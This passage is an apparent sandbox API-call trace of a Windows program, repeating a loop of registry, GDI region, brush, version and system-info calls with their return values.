ExceptionRecord=0x0, ReturnValue=0x0) [0017.470] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.470] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xc904027d [0017.470] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd3040713 [0017.470] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040931 [0017.470] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040932 [0017.470] CombineRgn (hrgnDst=0x1040931, hrgnSrc1=0xc904027d, hrgnSrc2=0xd3040713, iMode=1) returned 1 [0017.470] CombineRgn (hrgnDst=0x1040932, hrgnSrc1=0xc904027d, hrgnSrc2=0xd3040713, iMode=4) returned 2 [0017.470] CreateSolidBrush (color=0xff) returned 0x2100930 [0017.470] CreateSolidBrush (color=0xff0000) returned 0x1100933 [0017.470] DeleteObject (ho=0x1100933) returned 1 [0017.470] DeleteObject (ho=0xd3040713) returned 1 [0017.470] DeleteObject (ho=0xc904027d) returned 1 [0017.470] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.470] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.470] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.470] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.471] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.471] BeginPath (hdc=0x0) returned 0 [0017.471] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.471] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.471] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.471] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.471] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.471] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.471] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd4040713 [0017.471] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xca04027d [0017.471] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040934 [0017.471] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040935 [0017.471] CombineRgn (hrgnDst=0x1040934, hrgnSrc1=0xd4040713, hrgnSrc2=0xca04027d, iMode=1) returned 1 [0017.471] CombineRgn (hrgnDst=0x1040935, hrgnSrc1=0xd4040713, hrgnSrc2=0xca04027d, iMode=4) returned 2 [0017.471] CreateSolidBrush (color=0xff) returned 0x2100933 [0017.471] CreateSolidBrush (color=0xff0000) returned 0x1100936 [0017.471] DeleteObject (ho=0x1100936) returned 1 [0017.471] DeleteObject (ho=0xca04027d) returned 1 [0017.471] DeleteObject (ho=0xd4040713) returned 1 [0017.471] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.471] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.471] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.471] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.471] BeginPath (hdc=0x0) returned 0 [0017.471] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.471] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.471] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.471] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.472] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.472] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.472] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcb04027d [0017.472] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd5040713 [0017.472] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040937 [0017.472] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040938 [0017.472] CombineRgn (hrgnDst=0x1040937, hrgnSrc1=0xcb04027d, hrgnSrc2=0xd5040713, iMode=1) returned 1 [0017.472] CombineRgn (hrgnDst=0x1040938, hrgnSrc1=0xcb04027d, hrgnSrc2=0xd5040713, iMode=4) returned 2 [0017.472] CreateSolidBrush (color=0xff) returned 0x2100936 [0017.472] CreateSolidBrush (color=0xff0000) returned 0x1100939 [0017.472] DeleteObject (ho=0x1100939) returned 1 [0017.472] DeleteObject (ho=0xd5040713) returned 1 [0017.472] DeleteObject (ho=0xcb04027d) returned 1 [0017.472] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.472] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.472] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.472] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.472] BeginPath (hdc=0x0) returned 0 [0017.472] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.472] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.472] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.472] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.472] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.473] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.473] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd6040713 [0017.473] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xcc04027d [0017.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104093a [0017.473] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104093b [0017.473] CombineRgn (hrgnDst=0x104093a, hrgnSrc1=0xd6040713, hrgnSrc2=0xcc04027d, iMode=1) returned 1 [0017.473] CombineRgn (hrgnDst=0x104093b, hrgnSrc1=0xd6040713, hrgnSrc2=0xcc04027d, iMode=4) returned 2 [0017.473] CreateSolidBrush (color=0xff) returned 0x2100939 [0017.473] CreateSolidBrush (color=0xff0000) returned 0x110093c [0017.473] DeleteObject (ho=0x110093c) returned 1 [0017.473] DeleteObject (ho=0xcc04027d) returned 1 [0017.473] DeleteObject (ho=0xd6040713) returned 1 [0017.473] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.473] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.473] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.473] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.473] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.473] BeginPath (hdc=0x0) returned 0 [0017.473] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.473] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.473] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.473] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.473] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.473] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.473] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.474] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcd04027d [0017.474] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd7040713 [0017.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104093d [0017.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104093e [0017.474] CombineRgn (hrgnDst=0x104093d, hrgnSrc1=0xcd04027d, hrgnSrc2=0xd7040713, iMode=1) returned 1 [0017.474] CombineRgn (hrgnDst=0x104093e, hrgnSrc1=0xcd04027d, hrgnSrc2=0xd7040713, iMode=4) returned 2 [0017.474] CreateSolidBrush (color=0xff) returned 0x210093c [0017.474] CreateSolidBrush (color=0xff0000) returned 0x110093f [0017.474] DeleteObject (ho=0x110093f) returned 1 [0017.474] DeleteObject (ho=0xd7040713) returned 1 [0017.474] DeleteObject (ho=0xcd04027d) returned 1 [0017.474] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.474] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.474] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.474] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.474] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.474] BeginPath (hdc=0x0) returned 0 [0017.474] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.474] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.474] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.474] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.474] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.474] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.474] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.474] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.474] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd8040713 [0017.474] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xce04027d [0017.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040940 [0017.474] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040941 [0017.475] CombineRgn (hrgnDst=0x1040940, hrgnSrc1=0xd8040713, hrgnSrc2=0xce04027d, iMode=1) returned 1 [0017.475] CombineRgn (hrgnDst=0x1040941, hrgnSrc1=0xd8040713, hrgnSrc2=0xce04027d, iMode=4) returned 2 [0017.475] CreateSolidBrush (color=0xff) returned 0x210093f [0017.475] CreateSolidBrush (color=0xff0000) returned 0x1100942 [0017.475] DeleteObject (ho=0x1100942) returned 1 [0017.475] DeleteObject (ho=0xce04027d) returned 1 [0017.475] DeleteObject (ho=0xd8040713) returned 1 [0017.475] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.475] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.475] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.475] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.475] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.475] BeginPath (hdc=0x0) returned 0 [0017.475] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.475] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.475] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.475] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.475] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.475] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.475] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.475] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.475] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xcf04027d [0017.475] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd9040713 [0017.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040943 [0017.475] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040944 [0017.475] CombineRgn (hrgnDst=0x1040943, hrgnSrc1=0xcf04027d, hrgnSrc2=0xd9040713, iMode=1) returned 1 [0017.475] CombineRgn (hrgnDst=0x1040944, hrgnSrc1=0xcf04027d, hrgnSrc2=0xd9040713, iMode=4) returned 2 [0017.475] CreateSolidBrush (color=0xff) returned 0x2100942 [0017.475] CreateSolidBrush (color=0xff0000) returned 0x1100945 [0017.475] DeleteObject (ho=0x1100945) returned 1 [0017.475] DeleteObject (ho=0xd9040713) returned 1 [0017.475] DeleteObject (ho=0xcf04027d) returned 1 [0017.476] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.476] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.476] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.476] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.476] BeginPath (hdc=0x0) returned 0 [0017.476] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.476] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.476] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.476] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.476] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.476] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.476] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xda040713 [0017.476] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd004027d [0017.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040946 [0017.476] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040947 [0017.476] CombineRgn (hrgnDst=0x1040946, hrgnSrc1=0xda040713, hrgnSrc2=0xd004027d, iMode=1) returned 1 [0017.476] CombineRgn (hrgnDst=0x1040947, hrgnSrc1=0xda040713, hrgnSrc2=0xd004027d, iMode=4) returned 2 [0017.476] CreateSolidBrush (color=0xff) returned 0x2100945 [0017.476] CreateSolidBrush (color=0xff0000) returned 0x1100948 [0017.476] DeleteObject (ho=0x1100948) returned 1 [0017.476] DeleteObject (ho=0xd004027d) returned 1 [0017.476] DeleteObject (ho=0xda040713) returned 1 [0017.476] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.476] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.476] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.477] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.477] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.477] BeginPath (hdc=0x0) returned 0 [0017.477] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.477] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.477] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.477] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.477] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.477] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xd104027d [0017.477] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xdb040713 [0017.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040949 [0017.477] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104094a [0017.477] CombineRgn (hrgnDst=0x1040949, hrgnSrc1=0xd104027d, hrgnSrc2=0xdb040713, iMode=1) returned 1 [0017.477] CombineRgn (hrgnDst=0x104094a, hrgnSrc1=0xd104027d, hrgnSrc2=0xdb040713, iMode=4) returned 2 [0017.477] CreateSolidBrush (color=0xff) returned 0x2100948 [0017.477] CreateSolidBrush (color=0xff0000) returned 0x110094b [0017.477] DeleteObject (ho=0x110094b) returned 1 [0017.477] DeleteObject (ho=0xdb040713) returned 1 [0017.477] DeleteObject (ho=0xd104027d) returned 1 [0017.477] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.477] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.477] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.477] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.477] BeginPath (hdc=0x0) returned 0 [0017.477] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.477] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.477] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.477] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.477] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.478] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.478] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.478] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.478] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xdc040713 [0017.478] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xd204027d [0017.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104094c [0017.478] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104094d [0017.478] CombineRgn (hrgnDst=0x104094c, hrgnSrc1=0xdc040713, hrgnSrc2=0xd204027d, iMode=1) returned 1 [0017.478] CombineRgn (hrgnDst=0x104094d, hrgnSrc1=0xdc040713, hrgnSrc2=0xd204027d, iMode=4) returned 2 [0017.478] CreateSolidBrush (color=0xff) returned 0x210094b [0017.478] CreateSolidBrush (color=0xff0000) returned 0x110094e [0017.478] DeleteObject (ho=0x110094e) returned 1 [0017.478] DeleteObject (ho=0xd204027d) returned 1 [0017.478] DeleteObject (ho=0xdc040713) returned 1 [0017.478] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, 